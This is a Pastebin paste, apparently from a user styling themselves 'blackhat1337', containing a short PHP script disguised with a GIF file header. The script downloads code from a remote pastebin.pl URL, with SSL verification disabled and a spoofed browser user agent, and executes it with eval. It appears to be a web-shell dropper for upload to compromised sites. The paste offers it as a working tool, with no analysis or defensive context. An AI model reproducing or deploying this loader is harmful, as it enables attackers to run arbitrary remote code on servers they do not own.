blackhat1337

WSE

Apr 17th, 2022 (edited)
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.60 KB | None | 0 0
  1. GIF8root7a;
  2. <?php
  3. function opencontent($url){
  4. $ch = curl_init("$url");
  5. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  6. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  7. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  8. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  9. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  10. curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  11. curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  12. $result = curl_exec($ch);
  13. return $result;
  14. }
  15.  
  16. $a = opencontent('https://pastebin.pl/view/raw/f7c676ef');
  17. eval('?>'.$a);
Add Comment
Please, Sign In to add comment